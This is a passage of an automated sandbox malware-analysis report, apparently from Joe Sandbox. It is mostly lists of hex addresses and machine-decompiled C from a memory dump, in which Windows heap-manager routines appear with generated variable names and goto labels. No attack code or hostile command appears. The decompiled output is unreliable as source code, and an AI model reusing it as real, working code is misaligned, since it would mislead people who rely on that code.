                                                                                                            0x010d16a9
                                                                                                            0x010d16b5
                                                                                                            0x010d16ba
                                                                                                            0x010d16bc
                                                                                                            0x010d16be
                                                                                                            0x010d16c3
                                                                                                            0x010d16c3
                                                                                                            0x010d16bc
                                                                                                            0x010d16c8
                                                                                                            0x010d16cc
                                                                                                            0x010d181b
                                                                                                            0x010d181b
                                                                                                            0x010d181e
                                                                                                            0x010d181e
                                                                                                            0x010d1821
                                                                                                            0x010d1823
                                                                                                            0x010d1826
                                                                                                            0x010d1829
                                                                                                            0x010d182c
                                                                                                            0x010d182e
                                                                                                            0x010d1688
                                                                                                            0x010d1688
                                                                                                            0x010d1689
                                                                                                            0x010d168b
                                                                                                            0x010d168c
                                                                                                            0x010d168d
                                                                                                            0x010d168f
                                                                                                            0x010d1692
                                                                                                            0x00000000
                                                                                                            0x010d1692
                                                                                                            0x010d1834
                                                                                                            0x010d1836
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d183f
                                                                                                            0x010d1842
                                                                                                            0x010d1848
                                                                                                            0x010d184a
                                                                                                            0x010d1875
                                                                                                            0x010d1875
                                                                                                            0x010d1878
                                                                                                            0x010d187b
                                                                                                            0x010d187d
                                                                                                            0x010d1880
                                                                                                            0x010d1884
                                                                                                            0x010d18a7
                                                                                                            0x010d18a7
                                                                                                            0x010d18aa
                                                                                                            0x010d18ad
                                                                                                            0x010d18b6
                                                                                                            0x010d18bd
                                                                                                            0x010d18c0
                                                                                                            0x010d18c3
                                                                                                            0x010d18c5
                                                                                                            0x010d18c8
                                                                                                            0x010d18ca
                                                                                                            0x010d18ca
                                                                                                            0x010d18cd
                                                                                                            0x010d18cd
                                                                                                            0x010d18c8
                                                                                                            0x010d18d5
                                                                                                            0x010d18da
                                                                                                            0x010d18df
                                                                                                            0x010d18e2
                                                                                                            0x010d18e5
                                                                                                            0x010d18e7
                                                                                                            0x010d18ee
                                                                                                            0x010d18f2
                                                                                                            0x010d1912
                                                                                                            0x010d1917
                                                                                                            0x010d18f4
                                                                                                            0x010d190a
                                                                                                            0x010d190f
                                                                                                            0x010d1925
                                                                                                            0x010d192c
                                                                                                            0x010d1931
                                                                                                            0x010d193a
                                                                                                            0x010d193e
                                                                                                            0x010d1940
                                                                                                            0x010d1947
                                                                                                            0x010d1948
                                                                                                            0x010d1948
                                                                                                            0x010d193e
                                                                                                            0x010d18e5
                                                                                                            0x010d194f
                                                                                                            0x010d1952
                                                                                                            0x010d1956
                                                                                                            0x010d195d
                                                                                                            0x010d1961
                                                                                                            0x010d196d
                                                                                                            0x00000000
                                                                                                            0x010d196d
                                                                                                            0x010d188a
                                                                                                            0x010d188f
                                                                                                            0x010d1891
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d189d
                                                                                                            0x00000000
                                                                                                            0x010d189d
                                                                                                            0x010d184c
                                                                                                            0x010d1859
                                                                                                            0x010d1859
                                                                                                            0x010d185c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1851
                                                                                                            0x010d1853
                                                                                                            0x010d1855
                                                                                                            0x010d1865
                                                                                                            0x010d1865
                                                                                                            0x010d1866
                                                                                                            0x010d1868
                                                                                                            0x010d1870
                                                                                                            0x00000000
                                                                                                            0x010d1870
                                                                                                            0x010d1857
                                                                                                            0x010d1857
                                                                                                            0x010d185e
                                                                                                            0x00000000
                                                                                                            0x010d16d2
                                                                                                            0x010d16d2
                                                                                                            0x010d16d5
                                                                                                            0x010d16d5
                                                                                                            0x010d16d8
                                                                                                            0x010d16da
                                                                                                            0x010d16dd
                                                                                                            0x010d16e0
                                                                                                            0x010d16e3
                                                                                                            0x010d16e5
                                                                                                            0x010d1808
                                                                                                            0x010d1808
                                                                                                            0x010d1809
                                                                                                            0x010d1812
                                                                                                            0x010d1817
                                                                                                            0x010d1817

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                            • API String ID: 0-3178619729
                                                                                                            • Opcode ID: b7348c22f792edb86d1ab6838bc2ee0c8931c8782f7a69a273cd97a8dcc05d4b
                                                                                                            • Instruction ID: 92dfac952bb0f6ee2142dc13151b256243770f1aa83f108890781a4c737cd92a
                                                                                                            • Opcode Fuzzy Hash: b7348c22f792edb86d1ab6838bc2ee0c8931c8782f7a69a273cd97a8dcc05d4b
                                                                                                            • Instruction Fuzzy Hash: CD22D070604342DFEB65DF28C485BBABBF5EF45708F1885A9E4C68B246EB35D881CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0108B477(signed int __ecx, signed int* __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr* _v16;
                                                                                                            				signed int* _v20;
                                                                                                            				signed int _v24;
                                                                                                            				char _v28;
                                                                                                            				signed int _v44;
                                                                                                            				char _v48;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t131;
                                                                                                            				signed char _t134;
                                                                                                            				signed int _t139;
                                                                                                            				void* _t141;
                                                                                                            				signed int* _t143;
                                                                                                            				signed int* _t144;
                                                                                                            				intOrPtr* _t147;
                                                                                                            				char _t160;
                                                                                                            				signed int* _t163;
                                                                                                            				signed char* _t164;
                                                                                                            				intOrPtr _t165;
                                                                                                            				signed int* _t167;
                                                                                                            				signed char* _t168;
                                                                                                            				intOrPtr _t193;
                                                                                                            				intOrPtr* _t195;
                                                                                                            				signed int _t203;
                                                                                                            				signed int _t209;
                                                                                                            				signed int _t211;
                                                                                                            				intOrPtr _t214;
                                                                                                            				intOrPtr* _t231;
                                                                                                            				intOrPtr* _t236;
                                                                                                            				signed int _t237;
                                                                                                            				intOrPtr* _t238;
                                                                                                            				signed int _t240;
                                                                                                            				intOrPtr _t241;
                                                                                                            				char _t243;
                                                                                                            				signed int _t252;
                                                                                                            				signed int _t254;
                                                                                                            				signed char _t259;
                                                                                                            				signed int _t264;
                                                                                                            				signed int _t268;
                                                                                                            				intOrPtr _t277;
                                                                                                            				unsigned int _t279;
                                                                                                            				signed int* _t283;
                                                                                                            				intOrPtr* _t284;
                                                                                                            				unsigned int _t287;
                                                                                                            				signed int _t291;
                                                                                                            				signed int _t293;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t293;
                                                                                                            				_t223 = __edx;
                                                                                                            				_v20 = __edx;
                                                                                                            				_t291 = __ecx;
                                                                                                            				_t276 =  *__edx;
                                                                                                            				_t231 = E0108B8E4( *__edx);
                                                                                                            				_t292 = __ecx + 0x8c;
                                                                                                            				_v16 = _t231;
                                                                                                            				if(_t231 == __ecx + 0x8c) {
                                                                                                            					L38:
                                                                                                            					_t131 = 0;
                                                                                                            					L34:
                                                                                                            					return E010AB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                                                                                                            				}
                                                                                                            				if( *0x1158748 >= 1) {
                                                                                                            					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                                                                                                            					if(__eflags < 0) {
                                                                                                            						_t214 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t214 + 0xc);
                                                                                                            						if( *(_t214 + 0xc) == 0) {
                                                                                                            							_push("HEAP: ");
                                                                                                            							E0106B150();
                                                                                                            						} else {
                                                                                                            							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            						}
                                                                                                            						_push("(UCRBlock->Size >= *Size)");
                                                                                                            						E0106B150();
                                                                                                            						__eflags =  *0x1157bc8;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							__eflags = 1;
                                                                                                            							E01122073(_t223, 1, _t291, 1);
                                                                                                            						}
                                                                                                            						_t231 = _v16;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t5 = _t231 - 8; // -8
                                                                                                            				_t292 = _t5;
                                                                                                            				_t134 =  *((intOrPtr*)(_t292 + 6));
                                                                                                            				if(_t134 != 0) {
                                                                                                            					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                            				} else {
                                                                                                            					_t223 = _t291;
                                                                                                            				}
                                                                                                            				_t276 = _v20;
                                                                                                            				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                                                                                                            				_t139 =  *(_t291 + 0xcc) ^  *0x1158a68;
                                                                                                            				_v12 = _t139;
                                                                                                            				if(_t139 != 0) {
                                                                                                            					 *0x115b1e0(_t291,  &_v28, _t276);
                                                                                                            					_t141 = _v12();
                                                                                                            					goto L8;
                                                                                                            				} else {
                                                                                                            					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                                                                                                            					_v12 = _t203;
                                                                                                            					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                                                                                                            						_t264 = _v12;
                                                                                                            						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                                                                                                            						if(__eflags < 0) {
                                                                                                            							 *_t276 = _t264;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t209 =  *(_t291 + 0x40) & 0x00040000;
                                                                                                            					asm("sbb ecx, ecx");
                                                                                                            					_t268 = ( ~_t209 & 0x0000003c) + 4;
                                                                                                            					_v12 = _t268;
                                                                                                            					if(_t209 != 0) {
                                                                                                            						_push(0);
                                                                                                            						_push(0x14);
                                                                                                            						_push( &_v48);
                                                                                                            						_push(3);
                                                                                                            						_push(_t291);
                                                                                                            						_push(0xffffffff);
                                                                                                            						_t211 = E010A9730();
                                                                                                            						__eflags = _t211;
                                                                                                            						if(_t211 < 0) {
                                                                                                            							L56:
                                                                                                            							_push(_t268);
                                                                                                            							_t276 = _t291;
                                                                                                            							E0112A80D(_t291, 1, _v44, 0);
                                                                                                            							_t268 = 4;
                                                                                                            							goto L7;
                                                                                                            						}
                                                                                                            						__eflags = _v44 & 0x00000060;
                                                                                                            						if((_v44 & 0x00000060) == 0) {
                                                                                                            							goto L56;
                                                                                                            						}
                                                                                                            						__eflags = _v48 - _t291;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							goto L56;
                                                                                                            						}
                                                                                                            						_t268 = _v12;
                                                                                                            					}
                                                                                                            					L7:
                                                                                                            					_push(_t268);
                                                                                                            					_push(0x1000);
                                                                                                            					_push(_v20);
                                                                                                            					_push(0);
                                                                                                            					_push( &_v28);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_t141 = E010A9660();
                                                                                                            					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                                                                                                            					L8:
                                                                                                            					if(_t141 < 0) {
                                                                                                            						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                                                                                                            						goto L38;
                                                                                                            					}
                                                                                                            					_t143 =  *( *[fs:0x30] + 0x50);
                                                                                                            					if(_t143 != 0) {
                                                                                                            						__eflags =  *_t143;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                            						L11:
                                                                                                            						if( *_t144 != 0) {
                                                                                                            							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								E0112138A(_t223, _t291, _v28,  *_v20, 2);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                                                                                                            							_t287 =  *(_t291 + 0x50) ^  *_t292;
                                                                                                            							 *_t292 = _t287;
                                                                                                            							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                                                                                                            							if(_t287 >> 0x18 != _t259) {
                                                                                                            								_push(_t259);
                                                                                                            								E0111FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t147 = _v16 + 8;
                                                                                                            						 *((char*)(_t292 + 2)) = 0;
                                                                                                            						 *((char*)(_t292 + 7)) = 0;
                                                                                                            						_t236 =  *((intOrPtr*)(_t147 + 4));
                                                                                                            						_t277 =  *_t147;
                                                                                                            						_v24 = _t236;
                                                                                                            						_t237 =  *_t236;
                                                                                                            						_v12 = _t237;
                                                                                                            						_t238 = _v16;
                                                                                                            						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                                                                                                            							_push(_t238);
                                                                                                            							_push(_v12);
                                                                                                            							E0112A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                                                                                                            							_t238 = _v16;
                                                                                                            						} else {
                                                                                                            							_t195 = _v24;
                                                                                                            							 *_t195 = _t277;
                                                                                                            							 *((intOrPtr*)(_t277 + 4)) = _t195;
                                                                                                            						}
                                                                                                            						if( *(_t238 + 0x14) == 0) {
                                                                                                            							L22:
                                                                                                            							_t223[0x30] = _t223[0x30] - 1;
                                                                                                            							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                                                                                                            							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                                                                                                            							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                                                                                                            							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                                                                                                            							_t279 =  *(_t238 + 0x14);
                                                                                                            							if(_t279 >= 0x7f000) {
                                                                                                            								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                                                                                                            								_t279 =  *(_t238 + 0x14);
                                                                                                            							}
                                                                                                            							_t152 = _v20;
                                                                                                            							_t240 =  *_v20;
                                                                                                            							_v12 = _t240;
                                                                                                            							_t241 = _v16;
                                                                                                            							if(_t279 <= _t240) {
                                                                                                            								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                                                                                                            								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                                                                                                            									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                                                                                                            									L26:
                                                                                                            									_t243 = 0;
                                                                                                            									 *((char*)(_t292 + 3)) = 0;
                                                                                                            									_t276 = _t223[0x18];
                                                                                                            									if(_t223[0x18] != _t223) {
                                                                                                            										_t160 = (_t292 - _t223 >> 0x10) + 1;
                                                                                                            										_v24 = _t160;
                                                                                                            										__eflags = _t160 - 0xfe;
                                                                                                            										if(_t160 >= 0xfe) {
                                                                                                            											_push(0);
                                                                                                            											_push(0);
                                                                                                            											E0112A80D(_t276, 3, _t292, _t223);
                                                                                                            											_t160 = _v24;
                                                                                                            										}
                                                                                                            										_t243 = _t160;
                                                                                                            									}
                                                                                                            									 *((char*)(_t292 + 6)) = _t243;
                                                                                                            									_t163 =  *( *[fs:0x30] + 0x50);
                                                                                                            									if(_t163 != 0) {
                                                                                                            										__eflags =  *_t163;
                                                                                                            										if( *_t163 == 0) {
                                                                                                            											goto L28;
                                                                                                            										}
                                                                                                            										_t227 = 0x7ffe0380;
                                                                                                            										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                            										goto L29;
                                                                                                            									} else {
                                                                                                            										L28:
                                                                                                            										_t227 = 0x7ffe0380;
                                                                                                            										_t164 = 0x7ffe0380;
                                                                                                            										L29:
                                                                                                            										if( *_t164 != 0) {
                                                                                                            											_t165 =  *[fs:0x30];
                                                                                                            											__eflags =  *(_t165 + 0x240) & 0x00000001;
                                                                                                            											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                                                                                                            												__eflags = E01087D50();
                                                                                                            												if(__eflags != 0) {
                                                                                                            													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                            													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                            												}
                                                                                                            												_t276 = _t292;
                                                                                                            												E01121582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                                                                                                            											}
                                                                                                            										}
                                                                                                            										_t223 = 0x7ffe038a;
                                                                                                            										_t167 =  *( *[fs:0x30] + 0x50);
                                                                                                            										if(_t167 != 0) {
                                                                                                            											__eflags =  *_t167;
                                                                                                            											if( *_t167 == 0) {
                                                                                                            												goto L31;
                                                                                                            											}
                                                                                                            											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                            											goto L32;
                                                                                                            										} else {
                                                                                                            											L31:
                                                                                                            											_t168 = _t223;
                                                                                                            											L32:
                                                                                                            											if( *_t168 != 0) {
                                                                                                            												__eflags = E01087D50();
                                                                                                            												if(__eflags != 0) {
                                                                                                            													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                            													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                            												}
                                                                                                            												_t276 = _t292;
                                                                                                            												E01121582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                                                                                                            											}
                                                                                                            											_t131 = _t292;
                                                                                                            											goto L34;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t152 = _v20;
                                                                                                            							}
                                                                                                            							E0108B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                                                                                                            							 *_v20 =  *_v20 << 3;
                                                                                                            							goto L26;
                                                                                                            						} else {
                                                                                                            							_t283 =  *(_t291 + 0xb8);
                                                                                                            							if(_t283 != 0) {
                                                                                                            								_t190 =  *(_t238 + 0x14) >> 0xc;
                                                                                                            								while(1) {
                                                                                                            									__eflags = _t190 - _t283[1];
                                                                                                            									if(_t190 < _t283[1]) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									_t252 =  *_t283;
                                                                                                            									__eflags = _t252;
                                                                                                            									_v24 = _t252;
                                                                                                            									_t238 = _v16;
                                                                                                            									if(_t252 == 0) {
                                                                                                            										_t190 = _t283[1] - 1;
                                                                                                            										__eflags = _t283[1] - 1;
                                                                                                            										L70:
                                                                                                            										E0108BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                                                                                                            										_t238 = _v16;
                                                                                                            										goto L19;
                                                                                                            									}
                                                                                                            									_t283 = _v24;
                                                                                                            								}
                                                                                                            								goto L70;
                                                                                                            							}
                                                                                                            							L19:
                                                                                                            							_t193 =  *_t238;
                                                                                                            							_t284 =  *((intOrPtr*)(_t238 + 4));
                                                                                                            							_t254 =  *((intOrPtr*)(_t193 + 4));
                                                                                                            							_v24 = _t254;
                                                                                                            							_t238 = _v16;
                                                                                                            							if( *_t284 != _t254 ||  *_t284 != _t238) {
                                                                                                            								_push(_t238);
                                                                                                            								_push( *_t284);
                                                                                                            								E0112A80D(0, 0xd, _t238, _v24);
                                                                                                            								_t238 = _v16;
                                                                                                            							} else {
                                                                                                            								 *_t284 = _t193;
                                                                                                            								 *((intOrPtr*)(_t193 + 4)) = _t284;
                                                                                                            							}
                                                                                                            							goto L22;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L10:
                                                                                                            					_t144 = 0x7ffe0380;
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            			}





















































                                                                                                            0x0108b4ba
                                                                                                            0x0108b4ba
                                                                                                            0x0108b4bd
                                                                                                            0x0108b4c2
                                                                                                            0x0108b6d4
                                                                                                            0x0108b4c8
                                                                                                            0x0108b4c8
                                                                                                            0x0108b4c8
                                                                                                            0x0108b4cd
                                                                                                            0x0108b4d0
                                                                                                            0x0108b4d9
                                                                                                            0x0108b4df
                                                                                                            0x0108b4e2
                                                                                                            0x010d29b7
                                                                                                            0x010d29bd
                                                                                                            0x00000000
                                                                                                            0x0108b4e8
                                                                                                            0x0108b4e8
                                                                                                            0x0108b4ef
                                                                                                            0x0108b4fa
                                                                                                            0x0108b703
                                                                                                            0x0108b709
                                                                                                            0x0108b70b
                                                                                                            0x0108b711
                                                                                                            0x0108b711
                                                                                                            0x0108b70b
                                                                                                            0x0108b503
                                                                                                            0x0108b50c
                                                                                                            0x0108b511
                                                                                                            0x0108b514
                                                                                                            0x0108b519
                                                                                                            0x010d29c5
                                                                                                            0x010d29c7
                                                                                                            0x010d29cc
                                                                                                            0x010d29cd
                                                                                                            0x010d29cf
                                                                                                            0x010d29d0
                                                                                                            0x010d29d2
                                                                                                            0x010d29d7
                                                                                                            0x010d29d9
                                                                                                            0x010d29ee
                                                                                                            0x010d29ee
                                                                                                            0x010d29f4
                                                                                                            0x010d29fa
                                                                                                            0x010d2a01
                                                                                                            0x00000000
                                                                                                            0x010d2a01
                                                                                                            0x010d29db
                                                                                                            0x010d29df
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d29e1
                                                                                                            0x010d29e4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d29e6
                                                                                                            0x010d29e6
                                                                                                            0x0108b51f
                                                                                                            0x0108b51f
                                                                                                            0x0108b520
                                                                                                            0x0108b525
                                                                                                            0x0108b52b
                                                                                                            0x0108b52d
                                                                                                            0x0108b52e
                                                                                                            0x0108b530
                                                                                                            0x0108b535
                                                                                                            0x0108b53b
                                                                                                            0x0108b53d
                                                                                                            0x010d2a07
                                                                                                            0x00000000
                                                                                                            0x010d2a07
                                                                                                            0x0108b549
                                                                                                            0x0108b54e
                                                                                                            0x010d2a12
                                                                                                            0x010d2a15
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2a24
                                                                                                            0x0108b559
                                                                                                            0x0108b55c
                                                                                                            0x010d2a34
                                                                                                            0x010d2a3b
                                                                                                            0x010d2a4d
                                                                                                            0x010d2a4d
                                                                                                            0x010d2a3b
                                                                                                            0x0108b566
                                                                                                            0x0108b56b
                                                                                                            0x0108b56f
                                                                                                            0x0108b57b
                                                                                                            0x0108b582
                                                                                                            0x010d2a57
                                                                                                            0x010d2a5c
                                                                                                            0x010d2a5c
                                                                                                            0x0108b582
                                                                                                            0x0108b58b
                                                                                                            0x0108b58e
                                                                                                            0x0108b592
                                                                                                            0x0108b596
                                                                                                            0x0108b599
                                                                                                            0x0108b59b
                                                                                                            0x0108b59e
                                                                                                            0x0108b5a3
                                                                                                            0x0108b5a6
                                                                                                            0x0108b5a9
                                                                                                            0x010d2a66
                                                                                                            0x010d2a67
                                                                                                            0x010d2a73
                                                                                                            0x010d2a78
                                                                                                            0x0108b5b8
                                                                                                            0x0108b5b8
                                                                                                            0x0108b5bb
                                                                                                            0x0108b5bd
                                                                                                            0x0108b5bd
                                                                                                            0x0108b5c4
                                                                                                            0x0108b5f7
                                                                                                            0x0108b5f7
                                                                                                            0x0108b600
                                                                                                            0x0108b606
                                                                                                            0x0108b60c
                                                                                                            0x0108b612
                                                                                                            0x0108b618
                                                                                                            0x0108b621
                                                                                                            0x0108b623
                                                                                                            0x0108b629
                                                                                                            0x0108b629
                                                                                                            0x0108b62c
                                                                                                            0x0108b62f
                                                                                                            0x0108b633
                                                                                                            0x0108b636
                                                                                                            0x0108b639
                                                                                                            0x0108b71d
                                                                                                            0x0108b720
                                                                                                            0x0108b736
                                                                                                            0x0108b660
                                                                                                            0x0108b660
                                                                                                            0x0108b662
                                                                                                            0x0108b665
                                                                                                            0x0108b66a
                                                                                                            0x0108b6e6
                                                                                                            0x0108b6e7
                                                                                                            0x0108b6ea
                                                                                                            0x0108b6ef
                                                                                                            0x010d2ad1
                                                                                                            0x010d2ad2
                                                                                                            0x010d2ad8
                                                                                                            0x010d2add
                                                                                                            0x010d2add
                                                                                                            0x0108b6f5
                                                                                                            0x0108b6f5
                                                                                                            0x0108b672
                                                                                                            0x0108b675
                                                                                                            0x0108b67a
                                                                                                            0x010d2ae5
                                                                                                            0x010d2ae8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2af4
                                                                                                            0x010d2afc
                                                                                                            0x00000000
                                                                                                            0x0108b680
                                                                                                            0x0108b680
                                                                                                            0x0108b680
                                                                                                            0x0108b685
                                                                                                            0x0108b687
                                                                                                            0x0108b68a
                                                                                                            0x010d2b06
                                                                                                            0x010d2b0c
                                                                                                            0x010d2b13
                                                                                                            0x010d2b1e
                                                                                                            0x010d2b20
                                                                                                            0x010d2b2b
                                                                                                            0x010d2b2b
                                                                                                            0x010d2b2b
                                                                                                            0x010d2b34
                                                                                                            0x010d2b45
                                                                                                            0x010d2b45
                                                                                                            0x010d2b13
                                                                                                            0x0108b696
                                                                                                            0x0108b69b
                                                                                                            0x0108b6a0
                                                                                                            0x010d2b4f
                                                                                                            0x010d2b52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2b61
                                                                                                            0x00000000
                                                                                                            0x0108b6a6
                                                                                                            0x0108b6a6
                                                                                                            0x0108b6a6
                                                                                                            0x0108b6a8
                                                                                                            0x0108b6ab
                                                                                                            0x010d2b70
                                                                                                            0x010d2b72
                                                                                                            0x010d2b7d
                                                                                                            0x010d2b7d
                                                                                                            0x010d2b7d
                                                                                                            0x010d2b86
                                                                                                            0x010d2b97
                                                                                                            0x010d2b97
                                                                                                            0x0108b6b1
                                                                                                            0x00000000
                                                                                                            0x0108b6b1
                                                                                                            0x0108b6a0
                                                                                                            0x0108b67a
                                                                                                            0x0108b722
                                                                                                            0x0108b722
                                                                                                            0x0108b655
                                                                                                            0x0108b65d
                                                                                                            0x00000000
                                                                                                            0x0108b5c6
                                                                                                            0x0108b5c6
                                                                                                            0x0108b5ce
                                                                                                            0x010d2a83
                                                                                                            0x010d2a97
                                                                                                            0x010d2a97
                                                                                                            0x010d2a9a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2a88
                                                                                                            0x010d2a8a
                                                                                                            0x010d2a8c
                                                                                                            0x010d2a8f
                                                                                                            0x010d2a92
                                                                                                            0x010d2aa1
                                                                                                            0x010d2aa1
                                                                                                            0x010d2aa2
                                                                                                            0x010d2aab
                                                                                                            0x010d2ab0
                                                                                                            0x00000000
                                                                                                            0x010d2ab0
                                                                                                            0x010d2a94
                                                                                                            0x010d2a94
                                                                                                            0x00000000
                                                                                                            0x010d2a9c
                                                                                                            0x0108b5d4

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-4253913091
                                                                                                            • Opcode ID: 3dd9ee8771d144c2cc910a5df1ea57c9ffeba5f6a4d3a360eb461603980a519f
                                                                                                            • Instruction ID: 528b2dcd38cb96fbd4069f97cab79e102ce66970499fe0bb51e51aa9fd9e3087
                                                                                                            • Opcode Fuzzy Hash: 3dd9ee8771d144c2cc910a5df1ea57c9ffeba5f6a4d3a360eb461603980a519f
                                                                                                            • Instruction Fuzzy Hash: 76E19970604606DFDB19DF68C884BAEBBF5FF48304F1481A9E4929B391D734E981CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E01078794(void* __ecx) {
                                                                                                            				signed int _v0;
                                                                                                            				char _v8;
                                                                                                            				signed int _v12;
                                                                                                            				void* _v16;
                                                                                                            				signed int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				signed int _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v40;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr* _t77;
                                                                                                            				signed int _t80;
                                                                                                            				signed char _t81;
                                                                                                            				signed int _t87;
                                                                                                            				signed int _t91;
                                                                                                            				void* _t92;
                                                                                                            				void* _t94;
                                                                                                            				signed int _t95;
                                                                                                            				signed int _t103;
                                                                                                            				signed int _t105;
                                                                                                            				signed int _t110;
                                                                                                            				signed int _t118;
                                                                                                            				intOrPtr* _t121;
                                                                                                            				intOrPtr _t122;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t129;
                                                                                                            				signed int _t131;
                                                                                                            				signed int _t134;
                                                                                                            				signed int _t136;
                                                                                                            				signed int _t143;
                                                                                                            				signed int* _t147;
                                                                                                            				signed int _t151;
                                                                                                            				void* _t153;
                                                                                                            				signed int* _t157;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t166;
                                                                                                            				signed int _t168;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t153 = __ecx;
                                                                                                            				_t159 = 0;
                                                                                                            				_t121 = __ecx + 0x3c;
                                                                                                            				if( *_t121 == 0) {
                                                                                                            					L2:
                                                                                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
